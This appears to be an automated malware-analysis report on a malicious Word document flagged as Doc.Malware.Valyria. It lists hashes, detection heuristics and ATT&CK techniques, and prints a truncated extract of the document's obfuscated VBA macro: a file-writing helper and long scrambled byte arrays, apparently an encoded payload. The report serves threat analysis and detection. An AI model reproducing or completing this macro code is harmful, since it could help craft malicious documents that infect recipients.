Office (OLE) malware analysis — malicious · e566db9e491fda7a

MALICIOUS

Office (OLE)

82.0 KB Created: 2018-04-18 22:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 92f1bb5aa4a1c6c8ac81cbfdc2b3698a SHA-1: bd1e815dd492be3ff0ec54351fe61ce1b0e2a5af SHA-256: e566db9e491fda7a5d28ffe9019be64b4d9bc75014bbe189a9dcb9d987856558

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple high-severity heuristics including OLE_VBA_MACROS, OLE_VBA_GETOBJ, and OLE_VBA_CALLBYNAME. The ClamAV detection name 'Doc.Malware.Valyria-6744156-0' strongly suggests a known malware variant. The VBA code, though truncated, uses obfuscated byte arrays and function calls, typical of malware attempting to download and execute a secondary payload. The presence of macros points to a likely initial access vector via spearphishing attachment.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6744156-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6744156-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20439 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20439 bytes
SHA-256: `19c0e95b56bcfb9aafb75cb3c09f385a61256501eecb5fada9defff80d8d695c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame" Dim q96A779 Private Function tCFCA73(jA8DF, p2ED73) tCFCA73 = jA8DF - (p2ED73 * (jA8DF \ p2ED73)) End Function Private Function y3AECE(eF60932, cE0) Open eF60932 For Output As #1 Print #1, cE0 Close #1 End Function Sub mB20BEF() Dim mE0C02(5) As Byte mE0C02(4) = 67 mE0C02(3) = 66 mE0C02(0) = 65 mE0C02(1) = 53 mE0C02(5) = 48 mE0C02(2) = 69 Dim i00776(870) As Byte i00776(93) = 122 i00776(83) = 60 i00776(610) = 241 i00776(182) = 158 i00776(242) = 187 i00776(834) = 244 i00776(770) = 30 i00776(773) = 242 i00776(246) = 141 i00776(731) = 146 i00776(803) = 106 i00776(471) = 57 i00776(814) = 112 i00776(768) = 120 i00776(738) = 54 i00776(342) = 33 i00776(477) = 118 i00776(101) = 73 i00776(680) = 190 i00776(254) = 221 i00776(469) = 160 i00776(141) = 87 i00776(445) = 182 i00776(736) = 171 i00776(470) = 161 i00776(420) = 86 i00776(305) = 117 i00776(220) = 204 i00776(257) = 193 i00776(407) = 39 i00776(621) = 209 i00776(725) = 135 i00776(318) = 143 i00776(652) = 90 i00776(844) = 190 i00776(187) = 229 i00776(560) = 224 i00776(233) = 25 i00776(283) = 13 i00776(271) = 187 i00776(829) = 118 i00776(40) = 55 i00776(586) = 82 i00776(783) = 164 i00776(397) = 55 i00776(672) = 205 i00776(497) = 144 i00776(658) = 229 i00776(343) = 217 i00776(32) = 175 i00776(266) = 246 i00776(19) = 43 i00776(847) = 15 i00776(426) = 241 i00776(662) = 143 i00776(700) = 180 i00776(325) = 171 i00776(630) = 210 i00776(348) = 23 i00776(790) = 194 i00776(95) = 92 i00776(476) = 93 i00776(518) = 113 i00776(551) = 13 i00776(344) = 26 i00776(43) = 2 i00776(202) = 32 i00776(552) = 195 i00776(177) = 234 i00776(76) = 200 i00776(457) = 217 i00776(18) = 136 i00776(565) = 76 i00776(453) = 158 i00776(219) = 20 i00776(749) = 150 i00776(540) = 81 i00776(742) = 229 i00776(591) = 28 i00776(322) = 70 i00776(291) = 52 i00776(688) = 81 i00776(65) = 110 i00776(308) = 64 i00776(657) = 254 i00776(442) = 232 i00776(583) = 171 i00776(484) = 1 i00776(641) = 152 i00776(0) = 236 i00776(375) = 146 i00776(615) = 14 i00776(846) = 58 i00776(167) = 191 i00776(595) = 144 i00776(243) = 58 i00776(126) = 209 i00776(616) = 196 i00776(519) = 94 i00776(230) = 252 i00776(705) = 194 i00776(593) = 221 i00776(56) = 74 i00776(761) = 253 i00776(270) = 164 i00776(665) = 141 i00776(185) = 3 i00776(84) = 175 i00776(33) = 34 i00776(356) = 112 i00776(406) = 58 i00776(229) = 248 i00776(606) = 226 i00776(47) = 191 i00776(608) = 20 i00776(517) = 188 i00776(561) = 174 i00776(482) = 219 i00776(139) = 100 i00776(312) = 71 i00776(427) = 254 i00776(859) = 85 i00776(217) = 192 i00776(837) = 90 i00776(54) = 74 i00776(285) = 7 i00776(522) = 146 i00776(320) = 130 i00776(807) = 111 i00776(548) = 23 i00776(341) = 52 i00776(396) = 112 i00776(653) = 213 i00776(841) = 151 i00776(474) = 33 i00776(713) = 136 i00776(855) = 140 i00776(485) = 176 i00776(260) = 46 i00776(392) = 16 i00776(527) = 84 i00776(475) = 220 i00776(421) = 29 i00776(186) = 178 i00776(597) = 174 i00776(146) = 130 i00776(613) = 167 i00776(314) = 9 i00776(162) = 167 i00776(712) = 237 i00776(785) = 216 i00776(60) = 217 i00776(9) = 68 i00776(417) = 93 i00776(174) = 212 i00776(865) = 239 i00776(570) = 185 i00776(804) = 161 i00776(225) = 216 i00776(191) = 42 i00776(720) = 172 i00776(205) = 188 i00776(850) = 245 i00776(35) = 210 i00776(372) = 59 i00776(402) = 85 i00776(638) = 65 i00776(856) = 17 i00776(781) = 13 i00776(228) = 98 i00776(585) = 74 i00776(580) = 199 i00776(735) = 64 i00776(626) = 74 i00776(247) = 222 i00776(404) = 67 i00776(394) = 26 i00776(816) = 102 i00776(307) = 134 i00776(45) = 247 i00776(299) = 242 i00776(479) = 192 i00776(840) ... (truncated)

SHA-256: 19c0e95b56bcfb9aafb75cb3c09f385a61256501eecb5fada9defff80d8d695c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"
Dim q96A779
Private Function tCFCA73(jA8DF, p2ED73)
tCFCA73 = jA8DF - (p2ED73 * (jA8DF \ p2ED73))
End Function
Private Function y3AECE(eF60932, cE0)
Open eF60932 For Output As #1
Print #1, cE0
Close #1
End Function
Sub mB20BEF()
Dim mE0C02(5) As Byte
mE0C02(4) = 67
mE0C02(3) = 66
mE0C02(0) = 65
mE0C02(1) = 53
mE0C02(5) = 48
mE0C02(2) = 69
Dim i00776(870) As Byte
i00776(93) = 122
i00776(83) = 60
i00776(610) = 241
i00776(182) = 158
i00776(242) = 187
i00776(834) = 244
i00776(770) = 30
i00776(773) = 242
i00776(246) = 141
i00776(731) = 146
i00776(803) = 106
i00776(471) = 57
i00776(814) = 112
i00776(768) = 120
i00776(738) = 54
i00776(342) = 33
i00776(477) = 118
i00776(101) = 73
i00776(680) = 190
i00776(254) = 221
i00776(469) = 160
i00776(141) = 87
i00776(445) = 182
i00776(736) = 171
i00776(470) = 161
i00776(420) = 86
i00776(305) = 117
i00776(220) = 204
i00776(257) = 193
i00776(407) = 39
i00776(621) = 209
i00776(725) = 135
i00776(318) = 143
i00776(652) = 90
i00776(844) = 190
i00776(187) = 229
i00776(560) = 224
i00776(233) = 25
i00776(283) = 13
i00776(271) = 187
i00776(829) = 118
i00776(40) = 55
i00776(586) = 82
i00776(783) = 164
i00776(397) = 55
i00776(672) = 205
i00776(497) = 144
i00776(658) = 229
i00776(343) = 217
i00776(32) = 175
i00776(266) = 246
i00776(19) = 43
i00776(847) = 15
i00776(426) = 241
i00776(662) = 143
i00776(700) = 180
i00776(325) = 171
i00776(630) = 210
i00776(348) = 23
i00776(790) = 194
i00776(95) = 92
i00776(476) = 93
i00776(518) = 113
i00776(551) = 13
i00776(344) = 26
i00776(43) = 2
i00776(202) = 32
i00776(552) = 195
i00776(177) = 234
i00776(76) = 200
i00776(457) = 217
i00776(18) = 136
i00776(565) = 76
i00776(453) = 158
i00776(219) = 20
i00776(749) = 150
i00776(540) = 81
i00776(742) = 229
i00776(591) = 28
i00776(322) = 70
i00776(291) = 52
i00776(688) = 81
i00776(65) = 110
i00776(308) = 64
i00776(657) = 254
i00776(442) = 232
i00776(583) = 171
i00776(484) = 1
i00776(641) = 152
i00776(0) = 236
i00776(375) = 146
i00776(615) = 14
i00776(846) = 58
i00776(167) = 191
i00776(595) = 144
i00776(243) = 58
i00776(126) = 209
i00776(616) = 196
i00776(519) = 94
i00776(230) = 252
i00776(705) = 194
i00776(593) = 221
i00776(56) = 74
i00776(761) = 253
i00776(270) = 164
i00776(665) = 141
i00776(185) = 3
i00776(84) = 175
i00776(33) = 34
i00776(356) = 112
i00776(406) = 58
i00776(229) = 248
i00776(606) = 226
i00776(47) = 191
i00776(608) = 20
i00776(517) = 188
i00776(561) = 174
i00776(482) = 219
i00776(139) = 100
i00776(312) = 71
i00776(427) = 254
i00776(859) = 85
i00776(217) = 192
i00776(837) = 90
i00776(54) = 74
i00776(285) = 7
i00776(522) = 146
i00776(320) = 130
i00776(807) = 111
i00776(548) = 23
i00776(341) = 52
i00776(396) = 112
i00776(653) = 213
i00776(841) = 151
i00776(474) = 33
i00776(713) = 136
i00776(855) = 140
i00776(485) = 176
i00776(260) = 46
i00776(392) = 16
i00776(527) = 84
i00776(475) = 220
i00776(421) = 29
i00776(186) = 178
i00776(597) = 174
i00776(146) = 130
i00776(613) = 167
i00776(314) = 9
i00776(162) = 167
i00776(712) = 237
i00776(785) = 216
i00776(60) = 217
i00776(9) = 68
i00776(417) = 93
i00776(174) = 212
i00776(865) = 239
i00776(570) = 185
i00776(804) = 161
i00776(225) = 216
i00776(191) = 42
i00776(720) = 172
i00776(205) = 188
i00776(850) = 245
i00776(35) = 210
i00776(372) = 59
i00776(402) = 85
i00776(638) = 65
i00776(856) = 17
i00776(781) = 13
i00776(228) = 98
i00776(585) = 74
i00776(580) = 199
i00776(735) = 64
i00776(626) = 74
i00776(247) = 222
i00776(404) = 67
i00776(394) = 26
i00776(816) = 102
i00776(307) = 134
i00776(45) = 247
i00776(299) = 242
i00776(479) = 192
i00776(840)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.